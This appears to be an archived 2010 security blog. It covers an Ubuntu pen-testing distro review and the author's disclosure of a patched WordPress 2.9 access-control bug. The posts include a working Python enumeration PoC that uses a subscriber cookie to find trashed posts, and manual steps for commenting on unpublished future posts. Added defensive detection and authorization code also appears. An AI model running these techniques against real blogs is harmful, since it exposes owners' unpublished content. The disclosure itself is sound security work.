Ubuntu PE – A Review

by tmac on Apr.24, 2010, under Hacks, Linux, Projects

For a while now I have been trying to find ways in which I can have my pen-testing computer and personal computer together. At the end of the day, as long as my work reports and test results are encrypted, and I am not doing anything stupid in my personal time on the computer, why not have them together?

I currently have two working computers. I have my laptop which I use most of the time as it is (at the moment) the best machine I own. I also have a very old computer that was built around when I was about 13. The laptop is currently running Ubuntu 9.10 (although as soon as the upgrade to 10.10 is made public I will definitely be off of this) and the computer was running BackTrack.

BackTrack is a great pen-testing distribution; it does exactly what it is supposed to do. However, as a personal opinion and as someone who is really used to the GNOME interface and just Ubuntu as a whole, I prefer Ubuntu. I have been trying for a while (and not succeeding) to create my own personal distro, based on Ubuntu Minimal, on which I can install all the tools that I need. At first it seemed like a great idea, but the time quickly came upon me and with Uni and work commitments I found myself having to throw the project to the side into a very high pile.

That was until however I saw a post on Twitter mentioning Ubuntu Pen-Testing Edition. I quickly jumped on to the website at which point I found out that they were changing to a new dedicated website and the download wasn’t going to be available till tomorrow. Let me please point out however that the lead developer of this project, Vitomir Margetic, has been so helpful right from the start of my life with the distribution – every email I have sent has been answered with the utmost quickness and respect, so thank you.

After some server issues when it first came up I finally got it downloaded and installed into a virtual machine – which, if you're planning on doing that, make sure you allocate at least 1GB of RAM or more. As soon as it was installed I knew I was at home. Ubuntu PE was everything I liked about Ubuntu and BackTrack all in one. Ubuntu – because I knew how to get everything working exactly how I wanted it, i.e. Adobe Air, sound, PlayOnLinux etc., and BackTrack – because I used it in my pen-testing for work that evening and I wasn't a tool short, that night anyway.

There are a large number of tools within Ubuntu PE that I must admit are within BackTrack; however, there are other tools in there that are not. Then on the other hand there are parts of Ubuntu PE that I would want to change.

First of all, I installed it because I liked the GNOME interface, the one bar at the bottom and the other at the top; that wasn't there. It was a GNOME interface alright, but it looked like a copy of KDE, just the one bar at the bottom type thing. That was changed straight away. Secondly, there are tools I have installed on my computer that I use for testing that were not installed. An example of this is the screenshot taker Shutter, which if I am honest I couldn't live without, so take a look.

All in all it is much simpler, which to be fair is exactly what Ubuntu was designed for: somebody who is new to Linux (in my opinion anyway). The argument you have here is whether somebody who needs something simple should be using the hacking tools that are included in both of these distros. If they struggle with BT, should they not really be thinking "is this the distro for me?" I think it all comes down to how you want to use your pen-testing machine. Do you want a machine that you can use for everyday use as well, or do you want a machine just for your work? In my personal opinion the more things I can bunch together the better; this way I can use my other computer as a vulnerable machine to test my tools on.

I am moving away from Ubuntu soon, primarily because I think I am ready to move on to a harder distro so that I can learn more things about Linux itself, but secondly because of the way Ubuntu is changing – especially the new memory storage in version 10.10. So as for using this as my main system I would have to say no. However, over BackTrack I will use this. It is new, easier and quicker to get going with and it does the job that I need it to do. I know you all may think all you need is the terminal window, but when you're writing reports and taking screenshots it's always better to have a look at something graphical than just text; and because I know my way around Ubuntu so well now and I can edit it the way I like, i.e. RandomStorm logo on the bars etc., it works better for me.

This review wasn’t a dig at either community, just my personal opinion.

If you would like to download Ubuntu PE please visit – http://www.netinfinity.org/

New features are being developed as I am typing this review; I have some new-found friends in Dundee that are getting involved with creating and making this a better distro for pen testers to use. A repository is currently being created so that you can port all the tools into an already existent Ubuntu setup – again, some of this you can do with BackTrack, but without having to read countless guides on how to do it.

Thanks -
Thomas MacKenzie

interview about wordpress security fix

by tmac on Mar.10, 2010, under Hacks, Interviews, Personal

http://hackerpublicradio.org/eps/hpr0526.mp3

Arron Finnon (f1nux) – www.finux.co.uk – interviewed me about the security vulnerability that I found in WordPress.

It has come to my attention…

by tmac on Feb.16, 2010, under Hacks, Personal, Projects

It has come to my attention that some people are upset about the bug that I have found in WP as apparently someone else had reported it.

Well, the truth is that, looking into it now, that has been the case. The reason that I did not find it before is that the bug wasn't named how I myself thought it should have been. Nonetheless this person did find the bug and does deserve credit in the sense that they did try to go to WP to explain but were not successful.

caesarsgrunt – http://profiles.wordpress.org/caesarsgrunt

You can find more information here – http://hakre.wordpress.com/2010/02/16/the-short-memory-of-wordpress-org-security/

Please note I put a lot of hard work into finding and emulating this bug; I emailed WordPress directly with the advisory and I also have screenshots of how exactly the bug itself works.

Media attention!

by tmac on Feb.16, 2010, under Hacks, Personal, Projects

Following on from my findings in WordPress a new version has been released. Anyone using WP should upgrade to version 2.9.2 to stop the bug I found from affecting you.

After this was released I got about 5 trackbacks on the blog post, my name is on the front page of the WP website, and my name is 3rd in Google rankings.

Thank you all for the support through this and checking out the blog.

tmacuk

WordPress >= 2.9 Failure to Restrict URL Access

by tmac on Feb.13, 2010, under Hacks, Personal, Projects

Following on from the research I have been conducting, I have now released the following advisory, and it has been forwarded on to the correct people at WordPress.

WordPress >= 2.9 Failure to Restrict URL Access

http://www.thomasmackenzie.co.uk/

1. *Advisory Information*

Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010

2. *Vulnerability Information*

Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. *Software Description*

WordPress is a state-of-the-art publishing platform with a
focus on aesthetics, web standards, and usability. WordPress
is both free and priceless at the same time. [0]

4. *Vulnerability Description*

Frequently, the only protection for a URL is that links to that page
are not presented to unauthorized users. Security by obscurity is
not sufficient to protect sensitive functions and data in an application.
Access control checks must be performed before a request to a sensitive
function is granted, which ensures that the user is authorized to access
that function. [1]

5. *Vulnerable packages*

Versions >= 2.9

6. *Non-vulnerable packages*

Versions < 2.9

7. *Vulnerability Overview*

Since version 2.9 a new feature was implemented so that users
were able to retrieve posts that they may have deleted by accident.
This new feature was labeled 'trash'. Any posts that are placed within
the trash are only viewable by authenticated privileged users.

8. *Technical Description*

When WordPress implemented the new feature they failed to change the
permissions granted when the post is in the trash. This means that
an unauthenticated user cannot see the post; however, an authenticated
user can, no matter what privileges they have, even 'subscriber'.

“Subscriber [User Level 0] – Somebody who can read comments/comment/receive news letters, etc.” [2]

9. *PoC*


#!/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post IDs as an authenticated and unauthenticated user.
# If the responses differ a 'Trash' post has been found.
#
# You will need an authenticated user cookie of any privilege to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
#
# Python 2 script (httplib). The loop runs until a connection error or Ctrl-C.
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = "www.example.com"
userCookie = "enter_cookie_here"
postID = 0  # Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {"Cookie": userCookie}

print
print "Target = http://" + blogURL + "/?p=" + str(postID)
print

while 1:

    request = '/?p=' + str(postID)

    # Start non authenticated enumeration
    try:
        conn.request("GET", request, "")
        r1 = conn.getresponse()
        data1 = r1.read()
    except Exception as e:
        print "Connection error:", e
        break

    # Start authenticated enumeration
    try:
        conn.request("GET", request, None, Headers)
        r2 = conn.getresponse()
        data2 = r2.read()
    except Exception as e:
        print "Connection error:", e
        break

    # Compare the HTML body responses
    if data1 != data2:
        print "+ Found! http://" + blogURL + request
    else:
        print request

    postID += 1

conn.close()
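From the defender's side, the sweep the PoC above performs has a clear shape in ordinary web-server logs: one client walks the post ids in order, fetching each `/?p=N` twice (once with and once without the cookie). The following is an added example, not part of the advisory or its authors' code, that parses common-log-format lines and flags clients that request a run of consecutive post ids. The log lines, the addresses and the `min_run` threshold are constructed assumptions for illustration.

```python
import re
from collections import defaultdict

# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Only the default '/?p=<int>' permalink style, as the PoC itself assumes
POST_RE = re.compile(r'/\?p=(\d+)$')

def parse_line(line):
    """Return (ip, post_id, status) for a ?p=N request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    p = POST_RE.search(m.group("path"))
    if not p:
        return None
    return m.group("ip"), int(p.group(1)), int(m.group("status"))

def longest_consecutive_run(ids):
    """Return (start, end) of the longest run of consecutive integers in ids,
    or None if ids is empty. Duplicates (the PoC's two fetches per id) collapse."""
    uniq = sorted(set(ids))
    if not uniq:
        return None
    best_start = cur_start = uniq[0]
    best_len = cur_len = 1
    for prev, cur in zip(uniq, uniq[1:]):
        if cur == prev + 1:
            cur_len += 1
        else:
            cur_start, cur_len = cur, 1
        if cur_len > best_len:
            best_start, best_len = cur_start, cur_len
    return best_start, best_start + best_len - 1

def find_sweeps(lines, min_run=10):
    """Group ?p=N requests per client and flag clients whose longest run of
    consecutive ids is at least min_run. Returns {ip: (first_id, last_id, requests)}."""
    ids = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ids[rec[0]].append(rec[1])
    flagged = {}
    for ip, seen in ids.items():
        start, end = longest_consecutive_run(seen)
        if end - start + 1 >= min_run:
            flagged[ip] = (start, end, len(seen))
    return flagged

def _constructed_log():
    """Constructed sample: one ordinary reader and one client running the sweep,
    which requests every id from 0 upwards twice, exactly as the PoC does."""
    lines = [
        '203.0.113.7 - - [13/Feb/2010:10:00:00 +0000] "GET /?p=122 HTTP/1.1" 200 5120',
        '203.0.113.7 - - [13/Feb/2010:10:01:00 +0000] "GET /about/ HTTP/1.1" 200 2200',
        '203.0.113.7 - - [13/Feb/2010:10:02:00 +0000] "GET /?p=95 HTTP/1.1" 200 4100',
    ]
    for pid in range(0, 25):
        status = 200 if pid % 7 == 0 else 404   # most ids have no post
        for _ in range(2):                       # anonymous and cookied request
            lines.append('198.51.100.9 - - [13/Feb/2010:11:%02d:00 +0000] '
                         '"GET /?p=%d HTTP/1.1" %d 1500' % (pid % 60, pid, status))
    return lines

SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for ip, (first, last, n) in find_sweeps(SAMPLE_LOG).items():
        print("%s walked ?p=%d..%d in %d requests" % (ip, first, last, n))
```

The run length, not the request count, is the signal: a normal reader hits scattered ids, while the enumeration produces an unbroken ascending sequence regardless of whether each id returned a post or a 404.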

10. *Credits*

Thomas Mackenzie (tmacuk) – http://www.thomasmackenzie.co.uk/
Original finder and tester.

Ryan Dewhurst (ethicalhack3r) – http://www.ryandewhurst.co.uk/
PoC creation and analysis.

Arron Finnon (f1nux) – http://www.finux.co.co.uk/
Helped with documentation.

Matthew Hughes – http://www.matthewhughes.co.uk/
Helped with documentation.

Robin Wood (digininja) – http://www.digininja.org/
Helped identify the vulnerability type.

11. *References*

[0] http://wordpress.org/
[1] http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
[2] http://codex.wordpress.org/Roles_and_Capabilities

UPDATE: WordPress Bug 2.9.1 – Title BruteForce

by tmac on Feb.07, 2010, under Hacks

So last night I received a call from ethicalhack3r saying that the bug I had found should work in any blog because the permalinks are still available even if you choose a different one. So what we were searching for was ?p= and then a random page number that had a post on it that wasn't published.

He then wrote a script which would brute force the page numbers so that we could find them in any site. Not only did this show up all the drafts that I had at the moment, but also the posts that I had thought I had deleted. The posts that had been deleted and never shown, i.e. drafts, could be seen by a member on the forum. However, future posts could not be, but the title could be seen.

We started to run this script against other people’s blogs to see if it worked for them, and it didn’t. So we came to the conclusion that it was my blog that had something wrong. I removed all my plug-ins and got ethicalhack3r to try again and it still worked. So I was getting really frustrated that it was something that I had done.

I then checked my theme and realised that there was an update. So I updated and it still worked! Ethicalhack3r then made a test blog using the scripts available through our host and installed the latest version of my theme. It wasn’t working now. We came to the conclusion that it must be the theme, but why did it work on my site and not on the test?

We compared source code and found the following -

<title><?php if (is_home () ) { bloginfo('name'); echo " - "; bloginfo('description');
} elseif (is_category() ) {single_cat_title(); echo " - "; bloginfo('name');
} elseif (is_single() || is_page() ) {single_post_title(); echo " - "; bloginfo('name');
} elseif (is_search() ) {bloginfo('name'); echo " search results: "; echo wp_specialchars($s);
} else { wp_title('',true); }?></title>

More specifically we were looking for this -

else { wp_title('',true);

All this is doing is telling the page to replicate the title of the post inside the title tags. This can be found in the header.php

We then went to the website that the theme came from looking for a change log but couldn’t find one and we found that he hadn’t kept one. So all I know is that I was running > version 1.9.9.

A clean install of the theme would fix this, but the update doesn’t change this part of the code. After a few Google searches we found that a lot of people were using the old version of the theme and were vulnerable to the attack that I had found.
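The two failures on this page, the trash posts readable by any logged-in account in the advisory above (section 8) and the title leak from this theme's header.php, are the same missing check: the page decides on authentication (is anyone logged in? was a post queried?) where it should decide on authorization. The following is an added example, not WordPress's or the theme's own code: a small Python model of the decision, with the vulnerable and fixed versions side by side and the same decision applied to the `<title>` sink. Capability names follow the WordPress Roles and Capabilities page the advisory cites; the post statuses, users, site name and `serve` function are constructed assumptions.

```python
from dataclasses import dataclass, field

SITE_NAME = "Example Blog"  # constructed

@dataclass
class User:
    name: str
    caps: set = field(default_factory=set)   # capability names as in the WP codex

@dataclass
class Post:
    post_id: int
    author: str
    title: str
    body: str
    status: str   # "publish", "draft", "future" or "trash"

ANONYMOUS = User("anonymous")

def logged_in(user):
    return user is not ANONYMOUS

def can_edit(user, post):
    """Editor-level accounts may edit anything; an author may edit their own posts."""
    if "edit_others_posts" in user.caps:
        return True
    return post.author == user.name and "edit_posts" in user.caps

def visible_to_vulnerable(user, post):
    """Pre-2.9.2 behaviour as the advisory describes it: drafts and scheduled
    posts are gated on edit rights, but a post in the trash is shown to *any*
    logged-in account, even a subscriber holding only the 'read' capability."""
    if post.status == "publish":
        return True
    if post.status == "trash":
        return logged_in(user)
    return can_edit(user, post)

def visible_to_fixed(user, post):
    """One rule for every non-published status: the viewer must be allowed to
    edit the post. Being logged in is authentication, not authorization."""
    return post.status == "publish" or can_edit(user, post)

def page_title_vulnerable(user, post):
    """The old header.php fell through to wp_title(), which echoed the queried
    post's title even when the post itself was not being shown."""
    return "%s - %s" % (post.title, SITE_NAME)

def page_title_fixed(user, post):
    """Apply the same visibility decision to the <title> sink."""
    if visible_to_fixed(user, post):
        return "%s - %s" % (post.title, SITE_NAME)
    return SITE_NAME

def serve(user, post, visible=visible_to_fixed, title=page_title_fixed):
    """Model a request for /?p=<post_id>: returns (title, body); body is None
    when the post is withheld."""
    body = post.body if visible(user, post) else None
    return title(user, post), body

# Constructed sample data
POSTS = {
    122: Post(122, "tmac", "Public post", "everyone can read this", "publish"),
    153: Post(153, "tmac", "Unannounced product", "embargoed text", "future"),
    160: Post(160, "tmac", "Old rant", "binned text", "trash"),
}
SUBSCRIBER = User("reader", {"read"})
AUTHOR = User("tmac", {"read", "edit_posts"})
EDITOR = User("ed", {"read", "edit_posts", "edit_others_posts"})

if __name__ == "__main__":
    for who in (ANONYMOUS, SUBSCRIBER, AUTHOR, EDITOR):
        for pid in sorted(POSTS):
            old = serve(who, POSTS[pid], visible_to_vulnerable, page_title_vulnerable)
            new = serve(who, POSTS[pid])
            print("%-9s ?p=%d  old: %-38r  fixed: %r" % (who.name, pid, old[0], new[0]))
```

Running the block shows the subscriber reading the trashed post under the old rule and the anonymous visitor learning the scheduled post's title from the old `<title>`; under the fixed rule both requests reveal only the site name.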

Another interesting thing is that you can post a comment to the future post. I currently have two comments scheduled for 01/01/2011 – the first one is from ethicalhack3r saying "Muhahahaha" and the second one from Tom Sellers, someone who works on Nmap, said "Test post to Marty McFly."

This is how it is done -

Open any of your blog posts.  Save a copy of the HTML document to local
disk.  Open that file with an editor and replace all instances of the
post id (mine was copied from post 122, http://tmacuk.co.uk/?p=122)
with the post id of the future post, in your case 153.  It shows up in
a few formats (p=122, value="122, value='122) so just find and replace
the number.

Save the document and then open it.  Enter a comment and post it. It should
show up on your future post, McFly ;)   The captcha is a full link to the
captcha service so its live and works, BONUS!

So if you wanted to know why I have changed my theme, there you go. I am guessing that you can still comment on that post now; however, you wouldn't be able to find it because that bug isn't available on my site any more.

So the bug went a lot deeper than I first thought. I must thank ethicalhack3r and Tom Sellers for giving me some help last night, if it wasn’t for them this post would have probably taken a week to bring out and I probably would be using the same buggy theme.

Here is a link to the theme – http://wordpress.org/extend/themes/pixel. Remember a clean install will not produce the bug, so if you want to try it out, you need to edit the code to what I have talked about today.

tmacuk

Found a Bug in WordPress 2.9.1

by tmac on Feb.06, 2010, under Hacks

I found this after I published a post for the future.

I don't know how much you guys know about WordPress; the main thing I want you to know is that PlayStation and eBay use it.

Imagine if you could find out something that PlayStation was going to release before they announced it. Let's take the example of Apple announcing the iPad. It would make a lot of sense for them to write the article first and have it publish itself when they are giving the talk at whatever conference they did. What if you could see the title of this document beforehand?

Using simple URL bruteforcing you can. There are a number of different options in WordPress that you can use for your URL "Permalinks"; I just use ?p=153, meaning I guess post=(number). You can however use variations of dates, numbers or create your own.

I have just created a post which isn’t going to be released until next year take a look at http://tmacuk.co.uk/?p=153 – Look at the top of your browser and you can see the title of the post that I have made :)

Imagine finding out about the PlayStation 4 :S

tmacuk

Interview with the “Blackhat” – CC

by tmac on Feb.01, 2010, under Guest speakers, Hacks, Interviews, Personal, Projects

So finally the second interview has been recorded, edited and placed on the website.

After the success of my last interview, where I saw a record number of hits/comments on the website and a lot of replays on different security podcasts, I have decided to look more in depth into the technical world of a hacker.

The interview can be found here LINK

The script that we talk about on the call can be found here LINK

Any question email me at tmac<----@---->tmacuk.co.uk

Hopefully this will be uploaded on HPR very soon.

Interview with the “BlackHat” – n0 g00d

by tmac on Jan.12, 2010, under Guest speakers, Hacks, Interviews

The views expressed here are my own and not that of my University. I do not condone any of the actions within this interview and would like to make aware that this was done for educational purposes only. I condemn any of the actions that this hacker has done that are illegal and any comments made by myself that may seem to condone/agree with them is just the way I speak and act. I again must stress that this was done for educational purposes only and I DO NOT CONDONE AND CONDEMN the actions spoke about.

——
I have been wanting to do these interviews for a while but have struggled to find someone who will actually do the interview with me. I eventually found n0g00d in some vast corner of the internet – actually he commented on my website :P

I asked for the interview and he was more than happy. He talks to us about where he started, what he has done in the past and the reasons why he does it. He also asks me a question too.

Please enjoy the interview which can be found HERE

He also asked me to have this screenshot available to show you evidence of the "biggest thing he has hacked".

[Screenshot hosted on Photobucket]
